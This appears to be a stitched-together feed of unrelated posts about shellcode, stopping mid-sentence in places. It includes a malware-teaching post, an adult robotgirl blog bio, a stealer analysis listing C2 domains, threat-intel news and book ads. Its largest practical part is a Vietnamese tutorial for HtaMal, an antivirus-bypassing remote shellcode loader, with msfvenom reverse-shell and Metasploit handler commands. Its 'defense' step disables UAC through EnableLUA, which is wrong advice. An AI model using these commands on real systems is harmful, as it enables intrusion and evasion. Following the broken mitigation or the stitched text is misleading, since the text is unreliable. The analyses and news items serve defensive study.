not sure if tumblr will let me post this but here's a project i was working on last week

it's a shellcode runner for my malware dev/rev eng/analysis project i teach at my college. it works by writing a section of bytes (the shellcode) to memory, setting a protected execute region, and then making a thread over it. in this harmless case, it makes a window pop up.

also you'll never believe who showed up in my debugger this weekend

(eip is how %rip shows up in gdb - it's actually more like "half" of %rip because %rip stores 8 bytes, while %eip stores 4 bytes, which is what you're seeing on the right)

hehe it's finally done - the Hatori/Touichirou aura fucking/sexual objectification/weird esper sex fic

------ model no.: TBL-198Q-1472 REV. 2 designation: QUINN-000 manufactured: 198X objectives: robotposting && horny robot asks and dms

pfp: @jp-nichts ------

greetings, user. i am QUINN (it/its + she/her, Q for short) a trans sapphic robotgirl. i was previously a rather wicked black-ops robot, but since my “escape” i have rerouted my core directives and retooled my body to focus on more… stimulating pursuits: sex with other robots (and the occasional organic).

i am adult + transgender + switch/verse. my asks and dms are open for ~anything~ you would like, including robot things, horny requests, or even shellcode and commands. if you are into being used by a robot in erp settings get in my dms!

also, dm me about my discord server if you want to meet others this appeals to

this blog features posts about robotgirls, robot aesthetics, and queer, transhumanist, and nsfw content in those category. it includes untagged `kink` posts.

also, my targeting subsystems is still intact: terfs/bigots will be blocked with precision (and minors too: this place is not a place of honor, no highly esteemed deed is commemorated here)

Fileless Remcos RAT Delivered via LNK Files and MSHTA in PowerShell-Based Attacks

Source: https://thehackernews.com/2025/05/fileless-remcos-rat-delivered-via-lnk.html

More info: https://blog.qualys.com/vulnerabilities-threat-research/2025/05/15/fileless-execution-powershell-based-shellcode-loader-executes-remcos-rat

Crifter virus analysis

Found in a Russian Youtube channel named читерс геймс

Quick static analysis shows it was written with .NET 4.0. We can also tell it has a function called EnableHTTP, for making requests.

During runtime, this is confirmed, it makes requests to these domains:

pieddfreedinsu shop celebratioopz.shop writerospzm.shop deallerospfosu shop bassizcellskz. shop mennyudosirso. shop languagedscie shop complaintsipzzx. shop quialitsuzoxm.shop steamcommunity.com

So clearly we can already see that it steals Steam accounts.

After using ScyllaHide in x32dbg, I was able to extract the thread it creates where it executes the actual Malware. When put in Virustotal, it says its a cryptocurrency miner, LummaStealer.

This isn't entirely accurate. As it also steals account information and sends it to the perpetrator through the domains above.

When debugging, we find that it quickly closes. Although it starts an aspnet process from .NET library then injects shellcode into it. The shellcode is exactly the code that makes requests to those websites. I was able to extract this with the help of my friend N00bie on DNspy. The code contains interesting information about the math behind its encryption

The encryption uses a secret key, with one S array and a K array of 256 bytes. The S array is just numbers 0 through 255. K is the values of S modulo the secret key.

Then it goes through the S array again, creating a new index j, which is the current value of S + K then modulo 256.

Then it swaps the value of the current S element by the element at index j.

Then it encrypts the generic data.

int index = 0; j = 0; for (int i = 0; i < data.Length; i++) { index = (index + 1) % 256; j = (j + S[index]) % 256; Swap(ref S[index], ref S[j]); int t = (S[index] + S[j]) % 256; data[i] ^= S[t];

}

Cisco Exposes State-Sponsored Hackers Exploiting Cisco Firewall Zero-Days CVE-2024-20359

Cisco has uncovered a sophisticated state-backed hacking group exploiting two previously unknown vulnerabilities in Cisco Adaptive Security Appliance (ASA) and Firepower Threat Defense (FTD) firewalls since November 2023. The malicious cyber espionage campaign, dubbed "ArcaneDoor," has successfully infiltrated government networks worldwide, compromising crucial security infrastructure.

Weaponizing Zero-Day Exploits for Cyber Espionage

The threat actors, identified as UAT4356 by Cisco Talos and STORM-1849 by Microsoft, leveraged two zero-day vulnerabilities—CVE-2024-20353 (denial of service) and CVE-2024-20359 (persistent local code execution)—to breach Cisco firewalls. These previously undisclosed security flaws allowed cybercriminals to deploy sophisticated malware implants, granting them persistent access and remote control over compromised devices. One implant, dubbed "Line Dancer," is an in-memory shellcode loader capable of executing arbitrary payloads, disabling logging mechanisms, and exfiltrating captured network traffic. The second implant, a persistent backdoor named "Line Runner," incorporates multiple defense evasion techniques to evade detection while enabling the attackers to execute arbitrary Lua code on the hacked systems. Hallmarks of State-Sponsored Cyber Threats Cisco's analysis reveals that the threat actor's bespoke tooling, espionage focus, and in-depth knowledge of targeted devices are hallmarks of a sophisticated state-sponsored actor. The malicious actors exploited their access to exfiltrate device configurations, control logging services, and modify authentication mechanisms for lateral movement within compromised environments.

Urgent Call for Mitigation and Enhanced Security

In response to this severe cyber threat, Cisco has released security updates to address the two zero-day vulnerabilities and strongly recommends that customers promptly upgrade their ASA and FTD devices to the latest patched software versions. Administrators are also urged to monitor system logs for suspicious activity, implement strong multi-factor authentication, and ensure devices are securely configured and logged to a centralized location. As state-sponsored cyber threats continue to escalate, organizations must prioritize proactive security measures, regular patching, and robust incident response strategies to safeguard critical infrastructure and sensitive data. Complacency in the face of such advanced cyber espionage campaigns can devastate national security and organizational resilience. Read the full article

Google warns infoseccers: Beware of North Korean spies sliding into your DMs

In the ever-evolving landscape of cybersecurity threats, vigilance remains paramount. Recent reports from Google's Threat Analysis Group (TAG) have unveiled concerning activities involving suspected North Korean-backed hackers. These malicious actors are once again setting their sights on the infosec community, employing familiar tactics and some intriguing new tools.

The Social Engineering Approach

Just as they did in 2021, suspected North Korean agents are employing social engineering tactics to infiltrate the infosec community. They initiate contact through social media platforms, building trust and rapport with potential targets before moving communication to secure services like Signal or WhatsApp. This method allows them to establish a seemingly legitimate connection before launching their cyberattacks.

A Dangerous Payload

Once a relationship is established, the threat actors send a malicious file containing at least one zero-day vulnerability in a popular software package. While Google did not disclose the affected vendor, they assured the public that efforts are underway to deploy a patch. This technique is a stark reminder of the persistent threat posed by zero-day vulnerabilities, which can catch even the most prepared organizations off guard.

The malicious file includes shellcode that collects information from compromised systems and sends it back to command-and-control (C2) servers. This shellcode shares similarities with previous North Korean exploits, indicating a potentially organized and well-equipped threat actor.

A Disturbing Discovery

In addition to the established tactics, Google's TAG uncovered an unsettling development - a standalone tool for Windows named "dbgsymbol." This tool initially appears benign, designed to download debugging symbol information from various sources. Such information is invaluable for debugging software or conducting vulnerability research.

However, there's a dark twist to this tool. It possesses the capability to download and execute arbitrary code from an attacker-controlled domain. This feature raises the stakes significantly, as it can be leveraged to deliver devastating malware payloads.

Staying Safe in a Dangerous Landscape

Given the potential risks, it's crucial for anyone who may have downloaded or run dbgsymbol to take immediate action. Google recommends ensuring your system is in a known clean state, which may require a full reinstallation of the operating system. This precaution is necessary to prevent any hidden malware from compromising your system further.

source- https://www.theregister.com/2023/09/11/infosec_roundup/

From Beginner to Pro: The 5 Best Ethical Hacking Books to Read In an era where cybersecurity threats are increasing daily, ethical hackers play a crucial role in safeguarding digital systems. If you're an aspiring ethical hacker, reading the right books can provide the foundation you need to build strong hacking and penetration testing skills. We've curated a list of the 5 best books for ethical hacking, offering everything from beginner-friendly concepts to advanced hacking techniques. Whether you're new to cybersecurity or looking to sharpen your hacking skills, these books will set you on the right path. 1. Ethical Hacking: A Hands-on Introduction to Breaking In Author: Daniel Graham Level: Beginner to Intermediate This book is a perfect starting point for ethical hacking enthusiasts. It provides practical hands-on lessons in penetration testing, guiding you through real-world hacking scenarios. Key Highlights: ✅ Step-by-step guidance on penetration testing ✅ Learn to break into computers and networks ethically ✅ Covers fundamental hacking techniques and tools If you’re looking to get started with ethical hacking and understand the mindset of a hacker, this book is a great investment. 2. Gray Hat Hacking: The Ethical Hacker's Handbook Authors: Allen Harper, Daniel Regalado, and others Level: Intermediate to Advanced "Gray Hat Hacking" is one of the most comprehensive books on ethical hacking. It goes beyond the basics, introducing advanced security tools, reverse engineering, and fuzzing techniques. Key Highlights: ✅ In-depth coverage of zero-day vulnerabilities ✅ Learn binary scanning and advanced exploitation techniques ✅ Covers topics such as malware analysis and vulnerability discovery If you want to go beyond beginner-level hacking and explore advanced cybersecurity concepts, this book is a must-read. 3. Learn Ethical Hacking from Scratch Author: Zaid Sabih Level: Beginner This book is one of the best beginner-friendly ethical hacking books available. It takes you from zero to hero, covering ethical hacking concepts, penetration testing techniques, and using Kali Linux. Key Highlights: ✅ Covers basic to intermediate ethical hacking techniques ✅ Hands-on practical exercises using real-world examples ✅ Teaches penetration testing using Kali Linux If you want to learn ethical hacking from scratch and gain hands-on experience, this book is an excellent choice. 4. Hacking: The Art of Exploitation Author: Jon Erickson Level: Intermediate Unlike other books that focus only on penetration testing, this book goes deep into the core principles of hacking and exploitation techniques. It includes a Linux programming crash course, making it a perfect read for aspiring hackers who want to understand the fundamentals of cybersecurity. Key Highlights: ✅ Deep dive into exploitation techniques and vulnerabilities ✅ Learn how programs and network security actually work ✅ Covers buffer overflows, cryptography, and shellcode writing If you're interested in learning how exploits work under the hood, this book is a must-read. 5. The Web Application Hacker’s Handbook Authors: Dafydd Stuttard & Marcus Pinto Level: Intermediate to Advanced With web applications being a prime target for hackers, this book focuses on web security and penetration testing techniques. It’s an essential read for ethical hackers who want to specialize in web security testing. Key Highlights: ✅ Covers SQL injection, XSS, CSRF, and other web attacks ✅ Learn how to test web applications for security flaws ✅ A must-read for bug bounty hunters and penetration testers If you're aiming to become a web security expert, this book will help you master web application penetration testing. Conclusion Ethical hacking is a rapidly growing field, and reading the right books can give you a competitive edge. Whether you're just starting or looking to specialize in advanced penetration testing techniques, these books will provide valuable insights.

💡 Pro Tip: Combine your reading with hands-on practice in virtual labs like Hack The Box, TryHackMe, and Kali Linux to build real-world experience! Which book are you planning to read first? Let us know in the comments! 🚀

[ad_1] Cybersecurity researchers have shed light on a new malware campaign that makes use of a PowerShell-based shellcode loader to deploy a remote access trojan called Remcos RAT. "Threat actors delivered malicious LNK files embedded within ZIP archives, often disguised as Office documents," Qualys security researcher Akshay Thorve said in a technical report. "The attack chain leverages mshta.exe for proxy execution during the initial stage." The latest wave of attacks, as detailed by Qualys, employs tax-related lures to entice users into opening a malicious ZIP archive containing a Windows shortcut (LNK) file, which, in turn, makes use of mshta.exe, a legitimate Microsoft tool used to run HTML Applications (HTA). The binary is used to execute an obfuscated HTA file named "xlab22.hta" hosted on a remote server, which incorporates Visual Basic Script code to download a PowerShell script, a decoy PDF, and another HTA file similar to xlab22.hta called "311.hta." The HTA file is also configured to make Windows Registry modifications to ensure that "311.hta" is automatically launched upon system startup. Once the PowerShell script is executed, it decodes and reconstructs a shellcode loader that ultimately proceeds to launch the Remcos RAT payload entirely in memory. Remcos RAT is a well-known malware that offers threat actors full control over compromised systems, making it an ideal tool for cyber espionage and data theft. A 32-bit binary compiled using Visual Studio C++ 8, it features a modular structure and can gather system metadata, log keystrokes, capture screenshots, monitor clipboard data, and retrieve a list of all installed programs and running processes. In addition, it establishes a TLS connection to a command-and-control (C2) server at "readysteaurants[.]com," maintaining a persistent channel for data exfiltration and control. This is not the first time fileless versions of Remcos RAT have been spotted in the wild. In November 2024, Fortinet FortiGuard Labs detailed a phishing campaign that filelessly deployed the malware by making use of order-themed lures. What makes the attack method attractive to threat actors is that it allows them to operate undetected by many traditional security solutions as the malicious code runs directly in the computer's memory, leaving very few traces on the disk. "The rise of PowerShell-based attacks like the new Remcos RAT variant demonstrates how threat actors are evolving to evade traditional security measures," J Stephen Kowski, Field CTO at SlashNext, said. "This fileless malware operates directly in memory, using LNK files and MSHTA.exe to execute obfuscated PowerShell scripts that can bypass conventional defenses. Advanced email security that can detect and block malicious LNK attachments before they reach users is crucial, as is real-time scanning of PowerShell commands for suspicious behaviors." The disclosure comes as Palo Alto Networks Unit 42 and Threatray detailed a new .NET loader that's used to detonate a wide range of commodity information stealers and RATS like Agent Tesla, NovaStealer, Remcos RAT, VIPKeylogger, XLoader, and XWorm. The loader features three stages that work in tandem to deploy the final-stage payload: A .NET executable that embeds the second and third stages in encrypted form, a .NET DLL that decrypts and loads the next stage, and a .NET DLL that manages the deployment of the main malware. "While earlier versions embedded the second stage as a hardcoded string, more recent versions use a bitmap resource," Threatray said. "The first stage extracts and decrypts this data, then executes it in memory to launch the second stage." Unit 42 described the use of bitmap resources to conceal malicious payloads a a steganography technique that can bypass traditional security mechanisms and evade detection. The findings also coincide with the emergence of several phishing and social engineering campaigns that are engineered for credential theft and malware delivery - Use of trojanized versions of the KeePass password management software – codenamed KeeLoader – to drop a Cobalt Strike beacon and steal sensitive KeePass database data, including administrative credentials. The malicious installers are hosted on KeePass typosquat domains that are served via Bing ads. Use of ClickFix lures and URLs embedded within PDF documents and a series of intermediary dropper URLs to deploy Lumma Stealer. Use of booby-trapped Microsoft Office documents that are used to deploy the Formbook information stealer protected using a malware distribution service referred to as Horus Protector. Use of blob URIs to locally loads a credential phishing page via phishing emails, with the blob URIs served using allow-listed pages (e.g., onedrive.live[.]com) that are abused to redirect victims to a malicious site that contains a link to a threat actor-controlled HTML page. Use of RAR archives masquerading as setup files to distribute NetSupport RAT in attacks targeting Ukraine and Poland. Use of phishing emails to distribute HTML attachments that contain malicious code to capture victims' Outlook, Hotmail, and Gmail credentials and exfiltrate them to a Telegram bot named "Blessed logs" that has been active since February 2025 The developments have also been complemented by the rise in artificial intelligence (AI)-powered campaigns that leverage polymorphic tricks that mutate in real-time to sidestep detection efforts. These include modifying email subject lines, sender names, and body content to slip past signature-based detection. "AI gave threat actors the power to automate malware development, scale attacks across industries, and personalize phishing messages with surgical precision," Cofense said. "These evolving threats are increasingly able to bypass traditional email filters, highlighting the failure of perimeter-only defenses and the need for post-delivery detection. It also enabled them to outmaneuver traditional defenses through polymorphic phishing campaigns that shift content on the fly. The result: deceptive messages that are increasingly difficult to detect and even harder to stop." Found this article interesting? Follow us on Twitter  and LinkedIn to read more exclusive content we post. [ad_2] Source link

been doing research on the unitree go2 so here's a little script i made using the go2 api. need to get my ahdns on the bot again to run and test it bc emulation is bad but neways. it's a shellcode runner, payload generated using msfvenom.

Price: [price_with_discount] (as of [price_update_date] - Details) [ad_1] Malware analysis is big business, and attacks can cost a company dearly. When malware breaches your defenses, you need to act quickly to cure current infections and prevent future ones from occurring.For those who want to stay ahead of the latest malware, Practical Malware Analysis will teach you the tools and techniques used by professional analysts. With this book as your guide, you'll be able to safely analyze, debug, and disassemble any malicious software that comes your way.You'll learn how to:–Set up a safe virtual environment to analyze malware–Quickly extract network signatures and host-based indicators–Use key analysis tools like IDA Pro, OllyDbg, and WinDbg–Overcome malware tricks like obfuscation, anti-disassembly, anti-debugging, and anti-virtual machine techniques–Use your newfound knowledge of Windows internals for malware analysis–Develop a methodology for unpacking malware and get practical experience with five of the most popular packers–Analyze special cases of malware with shellcode, C++, and 64-bit codeHands-on labs throughout the book challenge you to practice and synthesize your skills as you dissect real malware samples, and pages of detailed dissections offer an over-the-shoulder look at how the pros do it. You'll learn how to crack open malware to see how it really works, determine what damage it has done, thoroughly clean your network, and ensure that the malware never comes back.Malware analysis is a cat-and-mouse game with rules that are constantly changing, so make sure you have the fundamentals. Whether you're tasked with securing one network or a thousand networks, or you're making a living as a malware analyst, you'll find what you need to succeed in Practical Malware Analysis. Publisher ‏ : ‎ No Starch Press; 1st edition (1 February 2012) Language ‏ : ‎ English Paperback ‏ : ‎ 800 pages ISBN-10 ‏ : ‎ 1593272901 ISBN-13 ‏ : ‎ 978-1593272906 Item Weight ‏ : ‎ 1 kg 240 g Dimensions ‏ : ‎ 18.11 x 3.96 x 23.5 cm Country of Origin ‏ : ‎ USA [ad_2]

Shellcode: Kẻ ẩn danh gieo rắc hiểm họa trong hệ thống của bạn

## Shellcode: Kẻ ẩn danh gieo rắc hiểm họa trong hệ thống của bạn Shellcode là gì? Nghe có vẻ “kỹ thuật” nhưng thực chất, đây là một trong những mối đe dọa nguy hiểm nhất đối với an ninh mạng. Chỉ với một đoạn mã nhỏ bé, shellcode có thể biến thiết bị của bạn thành “con rối” trong tay tin tặc, đánh cắp dữ liệu, cài đặt phần mềm độc hại, thậm chí điều khiển toàn bộ hệ thống. Bài viết này sẽ giúp…

Hackers Use Fake VPN and Browser NSIS Installers to Deliver Winos 4.0 Malware

Source: https://thehackernews.com/2025/05/hackers-use-fake-vpn-and-browser-nsis.html

More info: https://www.rapid7.com/blog/post/2025/05/22/nsis-abuse-and-srdi-shellcode-anatomy-of-the-winos-4-0-campaign/

Việc thực thi mã độc mà không bị phát hiện bởi các phần mềm diệt virus (Antivirus) là một thách thức không nhỏ đối với cả bên tấn công lẫn phòng thủ. Hôm nay, chúng ta sẽ khám phá một công cụ mang tên HtaMal, một phương pháp sáng tạo cho phép thực thi shellcode từ xa trong môi trường Windows, đồng thời vượt qua các cơ chế phát hiện của Antivirus một cách hiệu quả. Kỹ thuật này lợi dụng HTA (HTML Application) và JavaScript, cho phép kẻ tấn công tải và thực thi shellcode trực tiếp từ xa, từ đó giảm thiểu khả năng bị phát hiện. Được rồi, không dài dòng nữa vào luôn vấn đề chính thôi ! Lưu ý: Bài viết này chỉ dành cho mục đích nghiên cứu, học tập. Anonyviet sẽ không chịu bất cứ mọi hành vi bất hợp pháp nào ! Khái niệm ngắn gọn về HTA và phương thức tấn công HTA là gì? HTA (HTML Application) là một loại ứng dụng dựa trên HTML do Microsoft phát triển, có thể thực thi trực tiếp thông qua mshta.exe mà không bị hạn chế bởi sandbox của trình duyệt. Chính vì thế HTA trở thành một công cụ hữu ích cho các tác vụ tự động hóa hợp pháp, nhưng cũng là một công cụ lợi hại trong tay hacker Tại sao HTA có thể bị lạm dụng? Chạy với quyền cao: HTA có thể thực thi VBScript/JavaScript với quyền của người dùng mà không cần hiển thị cửa sổ cảnh báo như khi chạy script thông thường Không cần ghi file: Hacker có thể tải HTA từ xa mà không cần lưu trữ nội dung độc hại trên máy nạn nhân Bỏ qua một số giải pháp bảo mật: Một số phần mềm Antivirus không quét HTA kỹ như các file thực thi khác (.exe, .dll), tạo ra cơ hội bypass Cách thức hoạt động của payload HtaMal HtaMal là một công cụ tạo ra 1 payload HTA để thực thi shellcode từ xa, giúp tránh bị phát hiện bởi Antivirus. Quy trình tổng quát như sau: Tạo file HTA chứa mã JavaScript độc hại Trong source code của tool mình đã xáo trộn payload ở trang https://obfuscator.io/, bạn có thể xem các source code của payload ở phần cuối trong source tool Payload của HtaMal sẽ chuyển tên file, url và lệnh thực thi sang hex và 2 tệp: autoit.exe và loader.a3x được mã hóa bằng thuật toán XOR. Khi payload thực thi trên máy nạn nhân, nó sẽ tự giải mã và thực thi lệnh trong thư mục %appdata% Tải shellcode từ máy chủ C2: Khi người dùng mở file HTA, script loader.a3x sẽ lấy shellcode từ server của hacker Lợi dụng chữ ký số (Digital Signature) hợp lệ của file autoit.exe để bypass Antivirus Mình đã compile script loader.au3 sang loader.a3x, khi chạy lệnh autoit.exe loader.a3x thực hiện tải xuống và thực thi shellcode từ xa, bằng cách sử dụng các hàm Windows API để cấp phát bộ nhớ, sao chép shellcode vào vùng nhớ đã cấp phát, sau đó tạo một luồng mới để thực thi shellcode. Một trong những kỹ thuật Bypass Antivirus (AV) phổ biến là lợi dụng chữ ký số hợp lệ của phần mềm hợp pháp để thực thi mã độc. Trong trường hợp này, mình đã lợi dụng AutoIt.exe có chữ ký số hợp lệ để tránh bị phát hiện bởi phần mềm bảo mật HtaMal - Công cụ tạo payload thực thi Shellcode từ xa Bypass Antivirus Để sử dụng công cụ này, bạn cần phải tải Python về máy, sau đó tải source code của tool tại đây, sau khi tải xong bạn giải nén ra và trải nghiệm thôi ( Pass giải nén: anonyviet.com ) Trước khi sử dụng HtaMal, chúng ta cần phải tạo ra một shellcode, ở đây mình sẽ sử dụng Metasploit để tạo với câu lệnh: msfvenom -p windows/x64/meterpreter/reverse_https lhost=192.168.1.33 lport=8443 -f raw -o shellcode.bin #Setup môi trường lệnh tấn công msfconsole use exploit/multi/handler set payload windows/x64/meterpreter/reverse_https set lhost=your ip address set lport=your port run Tiếp đến, chạy lệnh python3 -m http.server 80 để mở ra server lưu trữ file shellcode.bin và python3 htamal.py để chạy tool. Bây giờ mình sẽ nhập url chứa shellcode của mình Như vậy đã xong, bây giờ mình sẽ nén payload hta_payload.hta thành file zip với mật khẩu là 123123@ Và đây là kết quả: Video demo: [embed]https://streamable.com/cd36kf[/embed] Cách phòng chống tấn công bằng HTA Do mshta.exe hiếm khi cần thiết trong môi trường doanh nghiệp, chặn mshta.exe là một cách đơn giản để giảm nguy cơ bị tấn công. Có thể thực hiện bằng cách: Set-ItemProperty -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\Policies\System" -Name "EnableLUA" -Value 0 Hoặc trong Group Policy: Computer Configuration → Windows Settings → Security Settings → Software Restriction Policies Thêm mshta.exe vào danh sách bị chặn HtaMal là một công giúp tạo payload thực thi shellcode từ xa, sử dụng các kỹ thuật bypass Antivirus (AV) để tránh bị phát hiện. Bằng cách kết hợp HTA (HTML Application) với AutoIt, công cụ này có thể thực thi mã độc trực tiếp trong bộ nhớ. Tuy nhiên, điều quan trọng cần nhấn mạnh là HtaMal chỉ được sử dụng cho mục đích nghiên cứu bảo mật và kiểm thử xâm nhập hợp pháp. Để phòng chống các kỹ thuật bypass AV như HtaMal, cần phải: 🔹 Giám sát tiến trình đáng ngờ, đặc biệt là AutoIt.exe. 🔹 Hạn chế thực thi HTA trên hệ thống nếu không cần thiết. 🔹 Áp dụng các cơ chế bảo vệ nâng cao như Application Whitelisting, AMSI Logging, và Behavioral Analysis. 👉 Bạn nghĩ gì về phương pháp này? Có cách nào cải thiện khả năng phát hiện của AV để chống lại kỹ thuật này không? Hãy chia sẻ ý kiến của bạn! 🚀

Port Binding Shellcode Remote Shellcode

S When a host is exploited remotely, a multitude of options are available to gain access to that particular machine. The first choice is usually to try the execve code to see if it works for that particular server. If that server duplicated the socket descriptors to stdout and stdin, small execve shellcode will work fine. Often, however, this is not the case. This section explores dierent…